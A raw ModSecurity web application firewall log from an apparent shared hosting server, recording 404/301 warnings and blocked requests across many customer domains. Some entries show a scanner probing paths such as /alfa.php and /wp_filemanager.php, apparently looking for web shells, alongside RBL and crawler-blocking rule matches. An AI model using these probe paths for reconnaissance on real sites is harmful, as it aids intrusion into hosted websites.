[Tue May 26 16:30:07.824168 2026] [security2:error] [pid 808625:tid 808849] [client 72.14.95.104:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV9NzEl_SBaWibfDmpG6QAAAF4"], referer: https://www.anujtradingco.com/
[Tue May 26 16:30:07.865410 2026] [security2:error] [pid 808625:tid 808877] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9NzEl_SBaWibfDmpG6gAAAHo"]
[Tue May 26 16:30:07.959231 2026] [security2:error] [pid 808625:tid 808757] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9NzEl_SBaWibfDmpG8AAAAAI"]
[Tue May 26 16:30:08.271063 2026] [security2:error] [pid 808625:tid 808838] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9ODEl_SBaWibfDmpHAAAAAFM"]
[Tue May 26 16:30:08.421844 2026] [security2:error] [pid 808625:tid 808778] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9ODEl_SBaWibfDmpHBgAAABc"]
[Tue May 26 16:30:08.480012 2026] [security2:error] [pid 808625:tid 808829] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9ODEl_SBaWibfDmpHCQAAAEo"]
[Tue May 26 16:30:08.491207 2026] [security2:error] [pid 808625:tid 808817] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9ODEl_SBaWibfDmpG-AAAAD4"]
[Tue May 26 16:30:08.606563 2026] [security2:error] [pid 808625:tid 808764] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9ODEl_SBaWibfDmpHDAAAAAk"]
[Tue May 26 16:30:08.929233 2026] [security2:error] [pid 808625:tid 808809] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9ODEl_SBaWibfDmpHDwAAADY"]
[Tue May 26 16:30:08.988335 2026] [security2:error] [pid 808625:tid 808871] [client 72.14.95.104:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV9ODEl_SBaWibfDmpHEgAAAHQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 16:30:09.126618 2026] [security2:error] [pid 808625:tid 808773] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9OTEl_SBaWibfDmpHGAAAABI"]
[Tue May 26 16:30:09.126733 2026] [security2:error] [pid 808625:tid 808807] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9OTEl_SBaWibfDmpHFwAAADQ"]
[Tue May 26 16:30:09.758680 2026] [security2:error] [pid 808625:tid 808837] [client 216.26.248.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV9OTEl_SBaWibfDmpHKgAAAFI"], referer: https://www.anujtradingco.com/
[Tue May 26 16:30:09.836363 2026] [security2:error] [pid 808625:tid 808851] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9OTEl_SBaWibfDmpHLQAAAGA"]
[Tue May 26 16:30:10.027710 2026] [security2:error] [pid 808625:tid 808663] [remote 74.7.241.58:59180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV9OjEl_SBaWibfDmpHPwAAWCU"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:30:10.106980 2026] [security2:error] [pid 808625:tid 808659] [remote 92.117.185.70:61382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.185.117.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahV9OTEl_SBaWibfDmpHNwAAViE"]
[Tue May 26 16:30:10.675280 2026] [security2:error] [pid 808625:tid 808792] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9OjEl_SBaWibfDmpHTwAAACU"]
[Tue May 26 16:30:10.678117 2026] [security2:error] [pid 808625:tid 808782] [client 216.26.248.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV9OjEl_SBaWibfDmpHUQAAABs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1513858&moderation-hash=d2dd97130483249a3cbb21d6660dad1f
[Tue May 26 16:30:11.042690 2026] [security2:error] [pid 808625:tid 808785] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9OjEl_SBaWibfDmpHRAAAAB4"]
[Tue May 26 16:30:11.430121 2026] [security2:error] [pid 808625:tid 808770] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9OzEl_SBaWibfDmpHYwAAAA8"]
[Tue May 26 16:30:12.861885 2026] [security2:error] [pid 808625:tid 808756] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9PDEl_SBaWibfDmpHiQAAAAE"]
[Tue May 26 16:30:13.354721 2026] [security2:error] [pid 808625:tid 808876] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9PDEl_SBaWibfDmpHgwAAAHk"]
[Tue May 26 16:30:14.878529 2026] [security2:error] [pid 808625:tid 808769] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9PjEl_SBaWibfDmpHqQAAAA4"]
[Tue May 26 16:30:15.516014 2026] [security2:error] [pid 808625:tid 808783] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9PzEl_SBaWibfDmpHzwAAABw"]
[Tue May 26 16:30:16.423683 2026] [security2:error] [pid 808625:tid 808752] [remote 193.42.61.12:58426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahV9QDEl_SBaWibfDmpH4AAAKH4"]
[Tue May 26 16:30:16.712811 2026] [security2:error] [pid 808625:tid 808786] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9QDEl_SBaWibfDmpH5wAAAB8"]
[Tue May 26 16:30:17.406509 2026] [security2:error] [pid 808625:tid 808756] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9QTEl_SBaWibfDmpH8QAAAAE"]
[Tue May 26 16:30:18.810676 2026] [security2:error] [pid 808625:tid 808822] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9QTEl_SBaWibfDmpIAQAAAEM"]
[Tue May 26 16:30:19.081640 2026] [security2:error] [pid 808625:tid 808880] [client 114.119.159.19:33019] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "operatives.org.in"] [uri "/operatives-clerk-annualreports.php"] [unique_id "ahV9QzEl_SBaWibfDmpIHAAAAH0"], referer: http://operatives.org.in/
[Tue May 26 16:30:20.158997 2026] [security2:error] [pid 808625:tid 808856] [client 162.158.48.166:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahV9QjEl_SBaWibfDmpIDQAAAGU"]
[Tue May 26 16:30:20.629338 2026] [security2:error] [pid 808625:tid 808866] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9RDEl_SBaWibfDmpIPgAAAG8"]
[Tue May 26 16:30:20.641952 2026] [security2:error] [pid 808625:tid 808794] [client 20.116.59.164:20283] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV9RDEl_SBaWibfDmpIQAAAACc"]
[Tue May 26 16:30:20.642120 2026] [security2:error] [pid 808625:tid 808794] [client 20.116.59.164:20283] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV9RDEl_SBaWibfDmpIQAAAACc"]
[Tue May 26 16:30:20.692322 2026] [security2:error] [pid 808625:tid 808850] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9RDEl_SBaWibfDmpIQgAAAF8"]
[Tue May 26 16:30:20.965827 2026] [security2:error] [pid 808625:tid 808777] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9RDEl_SBaWibfDmpIOAAAABY"]
[Tue May 26 16:30:21.073051 2026] [security2:error] [pid 808625:tid 808776] [client 20.116.59.164:20242] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahV9RTEl_SBaWibfDmpITQAAABU"]
[Tue May 26 16:30:21.073143 2026] [security2:error] [pid 808625:tid 808776] [client 20.116.59.164:20242] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahV9RTEl_SBaWibfDmpITQAAABU"]
[Tue May 26 16:30:21.193635 2026] [security2:error] [pid 808625:tid 808860] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9RTEl_SBaWibfDmpIUAAAAGk"]
[Tue May 26 16:30:21.360763 2026] [security2:error] [pid 808625:tid 808816] [client 20.116.59.164:27102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahV9RTEl_SBaWibfDmpIWwAAAD0"]
[Tue May 26 16:30:21.360868 2026] [security2:error] [pid 808625:tid 808816] [client 20.116.59.164:27102] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahV9RTEl_SBaWibfDmpIWwAAAD0"]
[Tue May 26 16:30:21.404309 2026] [security2:error] [pid 808625:tid 808843] [client 114.119.128.253:37107] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/prespontaneousfccb/feecab1839556.shtml"] [unique_id "ahV9RTEl_SBaWibfDmpIXAAAAFg"], referer: http://ghanemgh.com/prespontaneousfccb/feecab1839556.shtml
[Tue May 26 16:30:21.609551 2026] [security2:error] [pid 808625:tid 808798] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9RTEl_SBaWibfDmpIZAAAACs"]
[Tue May 26 16:30:21.742944 2026] [security2:error] [pid 808625:tid 808832] [client 20.116.59.164:20250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/public/css.php"] [unique_id "ahV9RTEl_SBaWibfDmpIbAAAAE0"]
[Tue May 26 16:30:21.743069 2026] [security2:error] [pid 808625:tid 808832] [client 20.116.59.164:20250] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/public/css.php"] [unique_id "ahV9RTEl_SBaWibfDmpIbAAAAE0"]
[Tue May 26 16:30:22.320223 2026] [security2:error] [pid 808625:tid 808771] [client 69.171.234.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "atreegroup.com"] [uri "/index.php"] [unique_id "ahV9RTEl_SBaWibfDmpIWQAAABA"]
[Tue May 26 16:30:22.651805 2026] [security2:error] [pid 808625:tid 808846] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9RjEl_SBaWibfDmpIgwAAAFs"]
[Tue May 26 16:30:22.935271 2026] [security2:error] [pid 808625:tid 808857] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9RjEl_SBaWibfDmpIjAAAAGY"]
[Tue May 26 16:30:23.401861 2026] [security2:error] [pid 808625:tid 808805] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9RjEl_SBaWibfDmpIfQAAADI"]
[Tue May 26 16:30:23.888445 2026] [security2:error] [pid 808625:tid 808868] [client 20.116.59.164:20269] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahV9RzEl_SBaWibfDmpIqQAAAHE"]
[Tue May 26 16:30:23.888578 2026] [security2:error] [pid 808625:tid 808868] [client 20.116.59.164:20269] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahV9RzEl_SBaWibfDmpIqQAAAHE"]
[Tue May 26 16:30:24.954101 2026] [security2:error] [pid 808625:tid 808777] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9RzEl_SBaWibfDmpIpQAAABY"]
[Tue May 26 16:30:26.431908 2026] [security2:error] [pid 808625:tid 808776] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9STEl_SBaWibfDmpIyQAAABU"]
[Tue May 26 16:30:26.438053 2026] [security2:error] [pid 808625:tid 808805] [client 62.244.225.226:6220] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahV9SjEl_SBaWibfDmpIzQAAADI"]
[Tue May 26 16:30:27.521689 2026] [security2:error] [pid 808625:tid 808875] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9SjEl_SBaWibfDmpI2gAAAHg"]
[Tue May 26 16:30:27.991070 2026] [security2:error] [pid 808625:tid 808791] [client 20.116.59.164:54475] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/css.php"] [unique_id "ahV9SzEl_SBaWibfDmpI8wAAACQ"]
[Tue May 26 16:30:27.991191 2026] [security2:error] [pid 808625:tid 808791] [client 20.116.59.164:54475] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/css.php"] [unique_id "ahV9SzEl_SBaWibfDmpI8wAAACQ"]
[Tue May 26 16:30:28.569375 2026] [security2:error] [pid 808625:tid 808760] [client 14.191.161.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9SzEl_SBaWibfDmpI7wAAAAU"]
[Tue May 26 16:30:29.349345 2026] [security2:error] [pid 808625:tid 808775] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9TDEl_SBaWibfDmpI_QAAABQ"]
[Tue May 26 16:30:31.178918 2026] [security2:error] [pid 808625:tid 808881] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9TjEl_SBaWibfDmpJIwAAAH4"]
[Tue May 26 16:30:33.296718 2026] [security2:error] [pid 808625:tid 808842] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9UDEl_SBaWibfDmpJVAAAAFc"]
[Tue May 26 16:30:33.597325 2026] [security2:error] [pid 808625:tid 808811] [client 20.116.59.164:63534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahV9UTEl_SBaWibfDmpJawAAADg"]
[Tue May 26 16:30:33.597416 2026] [security2:error] [pid 808625:tid 808811] [client 20.116.59.164:63534] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahV9UTEl_SBaWibfDmpJawAAADg"]
[Tue May 26 16:30:34.776157 2026] [security2:error] [pid 808625:tid 808835] [client 20.116.59.164:63515] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahV9UjEl_SBaWibfDmpJgAAAAFA"]
[Tue May 26 16:30:34.776267 2026] [security2:error] [pid 808625:tid 808835] [client 20.116.59.164:63515] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahV9UjEl_SBaWibfDmpJgAAAAFA"]
[Tue May 26 16:30:34.823155 2026] [security2:error] [pid 808625:tid 808763] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9UTEl_SBaWibfDmpJcQAAAAg"]
[Tue May 26 16:30:35.031957 2026] [security2:error] [pid 808625:tid 808817] [client 2.58.56.163:51663] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.co"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahV9UzEl_SBaWibfDmpJhgAAAD4"]
